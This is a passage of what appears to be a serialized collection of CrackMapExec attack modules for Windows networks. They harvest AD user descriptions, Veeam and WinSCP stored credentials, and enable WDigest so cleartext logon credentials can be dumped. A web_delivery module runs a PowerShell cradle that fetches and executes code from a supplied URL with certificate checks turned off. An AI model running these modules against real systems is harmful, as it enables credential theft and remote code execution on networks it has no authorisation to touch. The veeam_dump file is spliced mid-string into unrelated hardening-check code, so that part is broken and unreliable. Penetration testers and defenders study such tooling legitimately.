Path.home().joinpath(\".cme\").joinpath(\"logs\").joinpath(logfile)\n\n self.context.log.info(f\"Creating log file '{logfile}'\")\n self.log_file = open(logfile, \"w\")\n self.append_to_log(\"User:\", \"Description:\")\n\n def delete_log_file(self):\n \"\"\"\n Closes the log file.\n \"\"\"\n try:\n self.log_file.close()\n info = f\"Saved {self.desc_count} user descriptions to {self.log_file.name}\"\n self.context.log.highlight(info)\n except AttributeError:\n pass\n\n def append_to_log(self, user, description):\n \"\"\"\n Append a new entry to the log file. Helper function that is only used to have an\n unified padding on the user field.\n \"\"\"\n print(user.ljust(25), description, file=self.log_file)\n\n def process_record(self, item):\n \"\"\"\n Function that is called to process the items obtained by the LDAP search. All items are\n written to the log file per default. Items that contain one of the keywords configured\n within this module are also printed to stdout.\n\n On large Active Directories there seems to be a problem with duplicate user entries. For\n some reason the process_record function is called multiple times with the same user entry.\n Not sure whether this is a fault by this module or by impacket. As a workaround, this\n function adds each new account name to a set and skips accounts that have already been added.\n \"\"\"\n if not isinstance(item, ldapasn1.SearchResultEntry):\n return\n\n sAMAccountName = \"\"\n description = \"\"\n\n try:\n for attribute in item[\"attributes\"]:\n if str(attribute[\"type\"]) == \"sAMAccountName\":\n sAMAccountName = attribute[\"vals\"][0].asOctets().decode(\"utf-8\")\n elif str(attribute[\"type\"]) == \"description\":\n description = attribute[\"vals\"][0].asOctets().decode(\"utf-8\")\n except Exception as e:\n entry = sAMAccountName or \"item\"\n self.context.error(f\"Skipping {entry}, cannot process LDAP entry due to error: '{str(e)}'\")\n\n if description and sAMAccountName not in self.account_names:\n self.desc_count += 1\n self.append_to_log(sAMAccountName, description)\n\n if self.highlight(description):\n self.context.log.highlight(f\"User: {sAMAccountName} - Description: {description}\")\n\n self.account_names.add(sAMAccountName)\n\n def highlight(self, description):\n \"\"\"\n Check for interesting entries. Just checks whether certain keywords are contained within the\n user description. Keywords are configured at the top of this class within the options function.\n\n It is tempting to implement more logic here (e.g. catch all strings that are longer than seven\n characters and contain 3 different character classes). Such functionality is nice when playing\n CTF in small AD environments. When facing a real AD, such functionality gets annoying, because\n it generates too much output with 99% of it being false positives.\n\n The recommended way when targeting user descriptions is to use the keyword filter to catch low-hanging fruit.\n More dedicated searches for sensitive information should be done using the logfile.\n This allows you to refine your search query at any time without having to pull data from AD again.\n \"\"\"\n for keyword in self.keywords:\n if keyword.lower() in description.lower():\n return True\n return False\n" }, { "path": "cme/modules/veeam_dump.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Initially created by @sadshade, all output to him:\n# https://github.com/sadshade/veeam-output\n\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.dcerpc.v5 import rrp\nfrom impacket.examples.secretsdump import RemoteOperations\nimport traceback\nfrom base64 import b64encode\nfrom cme.helpers.powershell import get_ps_script\n\n\nclass CMEModule:\n \"\"\"\n Module by @NeffIsBack, @Marshall-Hallenbeck\n \"\"\"\n\n name = \"veeam\"\n description = \"Extracts credentials from local Veeam SQL Database\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = True\n\n def __init__(self):\n with open(get_ps_script(\"veeam_dump_module/veeam_dump_mssql.ps1\"), \"r\") as psFile:\n self.psScriptMssql = psFile.read()\n with open(get_ps_script(\"veeam_dump_module/veeam_dump_postgresql.ps1\"), \"r\") as psFile:\n self.psScriptPostgresql = psFile.read()\n\n def options(self, context, module_options):\n \"\"\"\n No options\n \"\"\"\n pass\n\n def checkVeeamInstalled(self, context, connection):\n context.log.display(\"Looking for Veeam installation...\")\n\n # MsSql\n SqlDatabase = \"\"\n SqlInstance = \"\"\n SqlServer = \"\"\n\n # PostgreSql\n PostgreSqlExec = \"\"\n PostgresUserForWindowsAuth = \"\"\n SqlDatabaseName = \"\"\n\n try:\n remoteOps = RemoteOperations(connection.conn, False)\n remoteOps.enableRegistry()\n\n ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)\n regHandle = ans[\"phKey\"]\n\n # Veeam v12 check\n try:\n ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, \"SOFTWARE\\\\Veeam\\\\Veeam Backup and Replication\\\\DatabaseConfigurations\",)\n keyHandle = ans[\"phkResult\"]\n\n database_config = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, \"SqlActiveConfiguration\")[1].split(\"\\x00\")[:-1][0]\n\n context.log.success(\"Veeam v12 installation found!\")\n if database_config == \"PostgreSql\":\n # Find the PostgreSql installation path containing \"psql.exe\"\n ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, \"SOFTWARE\\\\PostgreSQL Global Development Group\\\\PostgreSQL\",)\n keyHandle = ans[\"phkResult\"]\n PostgreSqlExec = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, \"Location\")[1].split(\"\\x00\")[:-1][0] + \"\\\\bin\\\\psql.exe\"\n\n ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, \"SOFTWARE\\\\Veeam\\\\Veeam Backup and Replication\\\\DatabaseConfigurations\\\\PostgreSQL\",)\n keyHandle = ans[\"phkResult\"]\n PostgresUserForWindowsAuth = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, \"PostgresUserForWindowsAuth\")[1].split(\"\\x00\")[:-1][0]\n SqlDatabaseName = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, \"SqlDatabaseName\")[1].split(\"\\x00\")[:-1][0]\n elif database_config == \"MsSql\":\n ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, \"SOFTWARE\\\\Veeam\\\\Veeam Backup and Replication\\\\DatabaseConfigurations\\\\MsSql\",)\n keyHandle = ans[\"phkResult\"]\n\n SqlDatabase = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, \"SqlDatabaseName\")[1].split(\"\\x00\")[:-1][0]\n SqlInstance = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, \"SqlInstanceName\")[1].split(\"\\x00\")[:-1][0]\n SqlServer = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, \"SqlServerName\")[1].split(\"\\x00\")[:-1][0]\n except DCERPCException as e:\n if str(e).find(\"ERROR_FILE_NOT_FOUND\"):\n context.log.debug(\"No Veeam v12 installation found\")\n except Exception as e:\n context.log.fail(f\"UNEXPECTED ERROR: {e}\")\n context.log.debug(traceback.format_exc())\n\n # Veeam v11 check\n try:\n ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, \"SOFTWARE\\\\Veeam\\\\Veeam Backup and Replication\",)\n keyHandle = ans[\"phkResult\"]\n\n SqlDatabase = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, \"SqlDatabaseName\")[1].split(\"\\x00\")[:-1][0]\n SqlInstance = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, \"SqlInstanceName\")[1].split(\"\\x00\")[:-1][0]\n SqlServer = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, \"SqlServerName\")[1].split(\"\\x00\")[:-1][0]\n\n context.log.success(\"Veeam v11 installation found!\")\n except DCERPCException as e:\n if str(e).find(\"ERROR_FILE_NOT_FOUND\"):\n context.log.debug(\"No Veeam v11 installation found\")\n except Exception as e:\n context.log.fail(f\"UNEXPECTED ERROR: {e}\")\n context.log.debug(traceback.format_exc())\n\n except NotImplementedError as e:\n pass\n except Exception as e:\n context.log.fail(f\"UNEXPECTED ERROR: {e}\")\n context.log.debug(traceback.format_exc())\n finally:\n try:\n remoteOps.finish()\n except Exception as e:\n context.log.debug(f\"Error shutting down remote registry service: {e}\")\n\n # Check if we found an SQL Server of some kind\n if SqlDatabase and SqlInstance and SqlServer:\n context.log.success(f'Found Veeam DB \"{SqlDatabase}\" on SQL Server \"{SqlServer}\\\\{SqlInstance}\"! Extracting stored credentials...')\n credentials = self.executePsMssql(context, connection, SqlDatabase, SqlInstance, SqlServer)\n self.printCreds(context, credentials)\n elif PostgreSqlExec and PostgresUserForWindowsAuth and SqlDatabaseName:\n context.log.success(f'Found Veeam DB \"{SqlDatabaseName}\" on an PostgreSQL Instance! Extracting stored credentials...')\n credentials = self.executePsPostgreSql(context, connection, PostgreSqlExec, PostgresUserForWindowsAuth, SqlDatabaseName)\n self.printCreds(context, credentials)\n\n def stripXmlOutput(self, context, output):\n return output.split(\"CLIXML\")[1].split(\" {OUTDATED_THRESHOLD} days ago']\n\n def check_administrator_name(self):\n user_info = self.get_user_info(self.connection, rid=500)\n name = user_info['UserName']\n ok = name not in ('Administrator', 'Administrateur')\n reasons = [f'Administrator name changed to {name}' if ok else 'Administrator name unchanged']\n return ok, reasons\n\n def check_guest_account_disabled(self):\n user_info = self.get_user_info(self.connection, rid=501)\n uac = user_info['UserAccountControl']\n disabled = bool(uac & samr.USER_ACCOUNT_DISABLED)\n reasons = ['Guest account disabled' if disabled else 'Guest account enabled']\n return disabled, reasons\n\n def check_spooler_service(self):\n ok = False\n service_config, service_status = self.get_service('Spooler', self.connection)\n if service_config['dwStartType'] == scmr.SERVICE_DISABLED:\n ok = True\n reasons = ['Spooler service disabled']\n else:\n reasons = ['Spooler service enabled']\n if service_status == scmr.SERVICE_RUNNING:\n reasons.append('Spooler service running')\n elif service_status == scmr.SERVICE_STOPPED:\n ok = True\n reasons.append('Spooler service not running')\n\n return ok, reasons\n\n def check_wsus_running(self):\n ok = True\n reasons = []\n service_config, service_status = self.get_service('wuauserv', self.connection)\n if service_config['dwStartType'] == scmr.SERVICE_DISABLED:\n reasons = ['WSUS service disabled']\n elif service_status != scmr.SERVICE_RUNNING:\n reasons = ['WSUS service not running']\n return ok, reasons\n\n def check_nbtns(self):\n key_name = 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\NetBT\\\\Parameters\\\\Interfaces'\n subkeys = self.reg_get_subkeys(self.dce, self.connection, key_name)\n success = False\n reasons = []\n missing = 0\n nbtns_enabled = 0\n for subkey in subkeys:\n value = self.reg_query_value(self.dce, self.connection, key_name + '\\\\' + subkey, 'NetbiosOptions')\n if type(value) == DCERPCSessionError:\n if value.error_code == ERROR_OBJECT_NOT_FOUND:\n missing += 1\n continue\n if value != 2:\n nbtns_enabled += 1\n if missing > 0:\n reasons.append(f'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\NetBT\\\\Parameters\\\\Interfaces\\\\\\\\NetbiosOption: value not found on {missing} interfaces')\n if nbtns_enabled > 0:\n reasons.append(f'NBTNS enabled on {nbtns_enabled} interfaces out of {len(subkeys)}')\n if missing == 0 and nbtns_enabled == 0:\n success = True\n reasons.append('NBTNS disabled on all interfaces')\n return success, reasons\n\n def check_applocker(self):\n key_name = 'HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\SrpV2'\n subkeys = self.reg_get_subkeys(self.dce, self.connection, key_name)\n rule_count = 0\n for collection in subkeys:\n collection_key_name = key_name + '\\\\' + collection\n rules = self.reg_get_subkeys(self.dce, self.connection, collection_key_name)\n rule_count += len(rules)\n success = rule_count > 0\n reasons = [f'Found {rule_count} AppLocker rules defined']\n\n return success, reasons\n\n # Methods for getting values from the remote registry #\n #######################################################\n\n def _open_root_key(self, dce, connection, root_key):\n ans = None\n retries = 1\n opener = {\n 'HKLM':rrp.hOpenLocalMachine,\n 'HKCR':rrp.hOpenClassesRoot,\n 'HKU':rrp.hOpenUsers,\n 'HKCU':rrp.hOpenCurrentUser,\n 'HKCC':rrp.hOpenCurrentConfig\n }\n\n while retries > 0:\n try:\n ans = opener[root_key.upper()](dce)\n break\n except KeyError:\n self.context.log.error(f'HostChecker._open_root_key():{connection.host}: Invalid root key. Must be one of HKCR, HKCC, HKCU, HKLM or HKU')\n break\n except Exception as e:\n self.context.log.error(f'HostChecker._open_root_key():{connection.host}: Error while trying to open {root_key.upper()}: {e}')\n if 'Broken pipe' in e.args:\n self.context.log.error('Retrying')\n retries -= 1\n return ans\n\n def reg_get_subkeys(self, dce, connection, key_name):\n root_key, subkey = key_name.split('\\\\', 1)\n ans = self._open_root_key(dce, connection, root_key)\n subkeys = []\n if ans is None:\n return subkeys\n\n root_key_handle = ans['phKey']\n try:\n ans = rrp.hBaseRegOpenKey(dce, root_key_handle, subkey)\n except DCERPCSessionError as e:\n if e.error_code != ERROR_FILE_NOT_FOUND:\n self.context.log.error(f'HostChecker.reg_get_subkeys(): Could not retrieve subkey {subkey}: {e}\\n')\n return subkeys\n except Exception as e:\n self.context.log.error(f'HostChecker.reg_get_subkeys(): Error while trying to retrieve subkey {subkey}: {e}\\n')\n return subkeys\n\n subkey_handle = ans['phkResult']\n i = 0\n while True:\n try:\n ans = rrp.hBaseRegEnumKey(dce=dce, hKey=subkey_handle, dwIndex=i)\n subkeys.append(ans['lpNameOut'][:-1])\n i += 1\n except DCERPCSessionError as e:\n break\n return subkeys\n\n def reg_query_value(self, dce, connection, keyName, valueName=None):\n \"\"\"\n Query remote registry data for a given registry value\n \"\"\"\n def subkey_values(subkey_handle):\n dwIndex = 0\n while True:\n try:\n value_type, value_name, value_data = get_value(subkey_handle, dwIndex)\n yield (value_type, value_name, value_data)\n dwIndex += 1\n except DCERPCSessionError as e:\n if e.error_code == ERROR_NO_MORE_ITEMS:\n break\n else:\n self.context.log.error(f'HostChecker.reg_query_value()->sub_key_values(): Received error code {e.error_code}')\n return\n\n def get_value(subkey_handle, dwIndex=0):\n ans = rrp.hBaseRegEnumValue(dce=dce, hKey=subkey_handle, dwIndex=dwIndex)\n value_type = ans['lpType']\n value_name = ans['lpValueNameOut']\n value_data = ans['lpData']\n\n # Do any conversion necessary depending on the registry value type\n if value_type in (\n REG_VALUE_TYPE_UNICODE_STRING,\n REG_VALUE_TYPE_UNICODE_STRING_WITH_ENV,\n REG_VALUE_TYPE_UNICODE_STRING_SEQUENCE):\n value_data = b''.join(value_data).decode('utf-16')\n else:\n value_data = b''.join(value_data)\n if value_type in (\n REG_VALUE_TYPE_32BIT_LE,\n REG_VALUE_TYPE_64BIT_LE):\n value_data = int.from_bytes(value_data, 'little')\n elif value_type == REG_VALUE_TYPE_32BIT_BE:\n value_data = int.from_bytes(value_data, 'big')\n\n return value_type, value_name[:-1], value_data\n\n try:\n root_key, subkey = keyName.split('\\\\', 1)\n except ValueError:\n self.context.log.error(f'HostChecker.reg_query_value(): Could not split keyname {keyName}')\n return\n\n ans = self._open_root_key(dce, connection, root_key)\n if ans is None:\n return ans\n\n root_key_handle = ans['phKey']\n try:\n ans = rrp.hBaseRegOpenKey(dce, root_key_handle, subkey)\n except DCERPCSessionError as e:\n if e.error_code == ERROR_FILE_NOT_FOUND:\n return e\n\n subkey_handle = ans['phkResult']\n\n if valueName is None:\n _,_, data = get_value(subkey_handle)\n else:\n found = False\n for _,name,data in subkey_values(subkey_handle):\n if name.upper() == valueName.upper():\n found = True\n break\n if not found:\n return DCERPCSessionError(error_code=ERROR_OBJECT_NOT_FOUND)\n return data\n\n # Methods for getting values from SAMR and SCM #\n ################################################\n\n def get_service(self, service_name, connection):\n \"\"\"\n Get the service status and configuration for specified service\n \"\"\"\n remoteOps = RemoteOperations(smbConnection=connection.conn, doKerberos=False)\n machine_name,_ = remoteOps.getMachineNameAndDomain()\n remoteOps._RemoteOperations__connectSvcCtl()\n dce = remoteOps._RemoteOperations__scmr\n scm_handle = scmr.hROpenSCManagerW(dce, machine_name)['lpScHandle']\n service_handle = scmr.hROpenServiceW(dce, scm_handle, service_name)['lpServiceHandle']\n service_config = scmr.hRQueryServiceConfigW(dce, service_handle)['lpServiceConfig']\n service_status = scmr.hRQueryServiceStatus(dce, service_handle)['lpServiceStatus']['dwCurrentState']\n remoteOps.finish()\n\n return service_config, service_status\n\n def get_user_info(self, connection, rid=501):\n \"\"\"\n Get user information for the user with the specified RID\n \"\"\"\n remoteOps = RemoteOperations(smbConnection=connection.conn, doKerberos=False)\n machine_name, domain_name = remoteOps.getMachineNameAndDomain()\n\n try:\n remoteOps.connectSamr(machine_name)\n except samr.DCERPCSessionError:\n # If connecting to machine_name didn't work, it's probably because\n # we're dealing with a domain controller, so we need to use the\n # actual domain name instead of the machine name, because DCs don't\n # use the SAM\n remoteOps.connectSamr(domain_name)\n\n dce = remoteOps._RemoteOperations__samr\n domain_handle = remoteOps._RemoteOperations__domainHandle\n user_handle = samr.hSamrOpenUser(dce, domain_handle, userId=rid)['UserHandle']\n user_info = samr.hSamrQueryInformationUser2(dce, user_handle, samr.USER_INFORMATION_CLASS.UserAllInformation)\n user_info = user_info['Buffer']['All']\n remoteOps.finish()\n return user_info\n\n def ls(self, smb, path='\\\\', share='C$'):\n l = []\n try:\n l = smb.conn.listPath(share, path)\n except SMBSessionError as e:\n if e.getErrorString()[0] not in ('STATUS_NO_SUCH_FILE', 'STATUS_OBJECT_NAME_NOT_FOUND'):\n self.context.log.error(f'ls(): C:\\\\{path} {e.getErrorString()}')\n except Exception as e:\n self.context.log.error(f'ls(): C:\\\\{path} {e}\\n')\n return l\n\n# Comparison operators #\n########################\n\ndef le(reg_sz_string, number):\n return int(reg_sz_string[:-1]) <= number\n\ndef in_(obj, seq):\n return obj in seq\n\ndef startswith(string, start):\n return string.startswith(start)\n\ndef not_(boolean_operator):\n def wrapper(*args, **kwargs):\n return not boolean_operator(*args, **kwargs)\n wrapper.__name__ = f'not_{boolean_operator.__name__}'\n return wrapper\n" }, { "path": "cme/modules/wdigest.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.dcerpc.v5 import rrp\nfrom impacket.examples.secretsdump import RemoteOperations\nfrom sys import exit\n\nclass CMEModule:\n\n name = \"wdigest\"\n description = \"Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = True\n\n def options(self, context, module_options):\n \"\"\"\n ACTION Create/Delete the registry key (choices: enable, disable, check)\n \"\"\"\n\n if not \"ACTION\" in module_options:\n context.log.fail(\"ACTION option not specified!\")\n exit(1)\n\n if module_options[\"ACTION\"].lower() not in [\"enable\", \"disable\", \"check\"]:\n context.log.fail(\"Invalid value for ACTION option!\")\n exit(1)\n\n self.action = module_options[\"ACTION\"].lower()\n\n def on_admin_login(self, context, connection):\n if self.action == \"enable\":\n self.wdigest_enable(context, connection.conn)\n elif self.action == \"disable\":\n self.wdigest_disable(context, connection.conn)\n elif self.action == \"check\":\n self.wdigest_check(context, connection.conn)\n\n def wdigest_enable(self, context, smbconnection):\n remoteOps = RemoteOperations(smbconnection, False)\n remoteOps.enableRegistry()\n\n if remoteOps._RemoteOperations__rrp:\n ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)\n regHandle = ans[\"phKey\"]\n\n ans = rrp.hBaseRegOpenKey(\n remoteOps._RemoteOperations__rrp,\n regHandle,\n \"SYSTEM\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest\",\n )\n keyHandle = ans[\"phkResult\"]\n\n rrp.hBaseRegSetValue(\n remoteOps._RemoteOperations__rrp,\n keyHandle,\n \"UseLogonCredential\\x00\",\n rrp.REG_DWORD,\n 1,\n )\n\n rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, \"UseLogonCredential\\x00\")\n\n if int(data) == 1:\n context.log.success(\"UseLogonCredential registry key created successfully\")\n\n try:\n remoteOps.finish()\n except:\n pass\n\n def wdigest_disable(self, context, smbconnection):\n remoteOps = RemoteOperations(smbconnection, False)\n remoteOps.enableRegistry()\n\n if remoteOps._RemoteOperations__rrp:\n ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)\n regHandle = ans[\"phKey\"]\n\n ans = rrp.hBaseRegOpenKey(\n remoteOps._RemoteOperations__rrp,\n regHandle,\n \"SYSTEM\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest\",\n )\n keyHandle = ans[\"phkResult\"]\n\n try:\n rrp.hBaseRegDeleteValue(\n remoteOps._RemoteOperations__rrp,\n keyHandle,\n \"UseLogonCredential\\x00\",\n )\n except:\n context.log.success(\"UseLogonCredential registry key not present\")\n\n try:\n remoteOps.finish()\n except:\n pass\n\n return\n\n try:\n # Check to make sure the reg key is actually deleted\n rtype, data = rrp.hBaseRegQueryValue(\n remoteOps._RemoteOperations__rrp,\n keyHandle,\n \"UseLogonCredential\\x00\",\n )\n except DCERPCException:\n context.log.success(\"UseLogonCredential registry key deleted successfully\")\n\n try:\n remoteOps.finish()\n except:\n pass\n\n def wdigest_check(self, context, smbconnection):\n remoteOps = RemoteOperations(smbconnection, False)\n remoteOps.enableRegistry()\n\n if remoteOps._RemoteOperations__rrp:\n ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)\n regHandle = ans[\"phKey\"]\n\n ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, \"SYSTEM\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest\")\n keyHandle = ans[\"phkResult\"]\n\n try:\n rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, \"UseLogonCredential\\x00\")\n if int(data) == 1:\n context.log.success(\"UseLogonCredential registry key is enabled\")\n else:\n context.log.fail(\"Unexpected registry value for UseLogonCredential: %s\" % data)\n except DCERPCException as d:\n if \"winreg.HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest\" in str(d):\n context.log.fail(\"UseLogonCredential registry key is disabled (registry key not found)\")\n else:\n context.log.fail(\"UseLogonCredential registry key not present\")\n try:\n remoteOps.finish()\n except:\n pass" }, { "path": "cme/modules/web_delivery.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom sys import exit\n\n\nclass CMEModule:\n \"\"\"\n Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module\n Reference: https://github.com/EmpireProject/Empire/blob/2.0_beta/data/module_source/code_execution/Invoke-MetasploitPayload.ps1\n\n Module by @byt3bl33d3r\n \"\"\"\n\n name = \"web_delivery\"\n description = \"Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module\"\n supported_protocols = [\"smb\", \"mssql\"]\n opsec_safe = True\n multiple_hosts = True\n\n def options(self, context, module_options):\n \"\"\"\n URL URL for the download cradle\n PAYLOAD Payload architecture (choices: 64 or 32) Default: 64\n \"\"\"\n\n if not \"URL\" in module_options:\n context.log.fail(\"URL option is required!\")\n exit(1)\n\n self.url = module_options[\"URL\"]\n\n self.payload = \"64\"\n if \"PAYLOAD\" in module_options:\n if module_options[\"PAYLOAD\"] not in [\"64\", \"32\"]:\n context.log.fail(\"Invalid value for PAYLOAD option!\")\n exit(1)\n self.payload = module_options[\"PAYLOAD\"]\n\n def on_admin_login(self, context, connection):\n ps_command = \"\"\"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};$client = New-Object Net.WebClient;$client.Proxy=[Net.WebRequest]::GetSystemWebProxy();$client.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('{}');\"\"\".format(self.url)\n if self.payload == \"32\":\n connection.ps_execute(ps_command, force_ps32=True)\n else:\n connection.ps_execute(ps_command, force_ps32=False)\n context.log.success(\"Executed web-delivery launcher\")\n" }, { "path": "cme/modules/webdav.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.protocols.smb.remotefile import RemoteFile\nfrom impacket import nt_errors\nfrom impacket.smb3structs import FILE_READ_DATA\nfrom impacket.smbconnection import SessionError\n\n\nclass CMEModule:\n \"\"\"\n Enumerate whether the WebClient service is running on the target by looking for the\n DAV RPC Service pipe. This technique was first suggested by Lee Christensen (@tifkin_)\n\n Module by Tobias Neitzel (@qtc_de)\n \"\"\"\n\n name = \"webdav\"\n description = \"Checks whether the WebClient service is running on the target\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = True\n\n def options(self, context, module_options):\n \"\"\"\n MSG Info message when the WebClient service is running. '{}' is replaced by the target.\n \"\"\"\n self.output = \"WebClient Service enabled on: {}\"\n\n if \"MSG\" in module_options:\n self.output = module_options[\"MSG\"]\n\n def on_login(self, context, connection):\n \"\"\"\n Check whether the 'DAV RPC Service' pipe exists within the 'IPC$' share. This indicates\n that the WebClient service is running on the target.\n \"\"\"\n try:\n remote_file = RemoteFile(connection.conn, \"DAV RPC Service\", \"IPC$\", access=FILE_READ_DATA)\n\n remote_file.open()\n remote_file.close()\n\n context.log.highlight(self.output.format(connection.conn.getRemoteHost()))\n\n except SessionError as e:\n if e.getErrorCode() == nt_errors.STATUS_OBJECT_NAME_NOT_FOUND:\n pass\n\n else:\n raise e\n" }, { "path": "cme/modules/whoami.py", "content": "class CMEModule:\n \"\"\"\n Basic enumeration of provided user information and privileges\n Module by spyr0 (@spyr0-sec)\n \"\"\"\n\n name = \"whoami\"\n description = \"Get details of provided user\"\n supported_protocols = [\"ldap\"]\n opsec_safe = True # Does the module touch disk?\n multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time?\n\n def options(self, context, module_options):\n \"\"\"\n USER Enumerate information about a different SamAccountName\n \"\"\"\n self.username = None\n if \"USER\" in module_options:\n self.username = module_options[\"USER\"]\n\n def on_login(self, context, connection):\n searchBase = connection.ldapConnection._baseDN\n if self.username is None:\n searchFilter = f\"(sAMAccountName={connection.username})\"\n else:\n searchFilter = f\"(sAMAccountName={format(self.username)})\"\n\n context.log.debug(f\"Using naming context: {searchBase} and {searchFilter} as search filter\")\n\n # Get attributes of provided user\n r = connection.ldapConnection.search(\n searchBase=searchBase,\n searchFilter=searchFilter,\n attributes=[\n \"name\",\n \"sAmAccountName\",\n \"description\",\n \"distinguishedName\",\n \"pwdLastSet\",\n \"logonCount\",\n \"lastLogon\",\n \"userAccountControl\",\n \"servicePrincipalName\",\n \"memberOf\",\n ],\n sizeLimit=999,\n )\n for response in r[0][\"attributes\"]:\n if \"userAccountControl\" in str(response[\"type\"]):\n if str(response[\"vals\"][0]) == \"512\":\n context.log.highlight(f\"Enabled: Yes\")\n context.log.highlight(f\"Password Never Expires: No\")\n elif str(response[\"vals\"][0]) == \"514\":\n context.log.highlight(f\"Enabled: No\")\n context.log.highlight(f\"Password Never Expires: No\")\n elif str(response[\"vals\"][0]) == \"66048\":\n context.log.highlight(f\"Enabled: Yes\")\n context.log.highlight(f\"Password Never Expires: Yes\")\n elif str(response[\"vals\"][0]) == \"66050\":\n context.log.highlight(f\"Enabled: No\")\n context.log.highlight(f\"Password Never Expires: Yes\")\n elif \"lastLogon\" in str(response[\"type\"]):\n if str(response[\"vals\"][0]) == \"1601\":\n context.log.highlight(f\"Last logon: Never\")\n else:\n context.log.highlight(f\"Last logon: {response['vals'][0]}\")\n elif \"memberOf\" in str(response[\"type\"]):\n for group in response[\"vals\"]:\n context.log.highlight(f\"Member of: {group}\")\n elif \"servicePrincipalName\" in str(response[\"type\"]):\n context.log.highlight(f\"Service Account Name(s) found - Potentially Kerberoastable user!\")\n for spn in response[\"vals\"]:\n context.log.highlight(f\"Service Account Name: {spn}\")\n else:\n context.log.highlight(response[\"type\"] + \": \" + response[\"vals\"][0])\n" }, { "path": "cme/modules/winscp_dump.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# If you are looking for a local Version, the baseline code is from https://github.com/NeffIsBack/WinSCPPasswdExtractor\n# References and inspiration:\n# - https://github.com/anoopengineer/winscppasswd\n# - https://github.com/dzxs/winscppassword\n# - https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/parser/winscp.rb\n\nimport traceback\nfrom typing import Tuple\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.dcerpc.v5 import rrp\nfrom impacket.examples.secretsdump import RemoteOperations\nfrom urllib.parse import unquote\nfrom io import BytesIO\nimport re\nimport configparser\n\n\nclass CMEModule:\n \"\"\"\n Module by @NeffIsBack\n \"\"\"\n\n name = \"winscp\"\n description = \"Looks for WinSCP.ini files in the registry and default locations and tries to extract credentials.\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = True\n\n def options(self, context, module_options):\n \"\"\"\n PATH Specify the Path if you already found a WinSCP.ini file. (Example: PATH=\"C:\\\\Users\\\\USERNAME\\\\Documents\\\\WinSCP_Passwords\\\\WinSCP.ini\")\n\n REQUIRES ADMIN PRIVILEGES:\n As Default the script looks into the registry and searches for WinSCP.ini files in\n \\\"C:\\\\Users\\\\{USERNAME}\\\\Documents\\\\WinSCP.ini\\\" and in\n \\\"C:\\\\Users\\\\{USERNAME}\\\\AppData\\\\Roaming\\\\WinSCP.ini\\\",\n for every user found on the System.\n \"\"\"\n if \"PATH\" in module_options:\n self.filepath = module_options[\"PATH\"]\n else:\n self.filepath = \"\"\n\n self.PW_MAGIC = 0xA3\n self.PW_FLAG = 0xFF\n self.share = \"C$\"\n self.userDict = {}\n\n # ==================== Helper ====================\n def printCreds(self, context, session):\n if type(session) is str:\n context.log.fail(session)\n else:\n context.log.highlight(\"======={s}=======\".format(s=session[0]))\n context.log.highlight(\"HostName: {s}\".format(s=session[1]))\n context.log.highlight(\"UserName: {s}\".format(s=session[2]))\n context.log.highlight(\"Password: {s}\".format(s=session[3]))\n\n def userObjectToNameMapper(self, context, connection, allUserObjects):\n try:\n remoteOps = RemoteOperations(connection.conn, False)\n remoteOps.enableRegistry()\n\n ans = 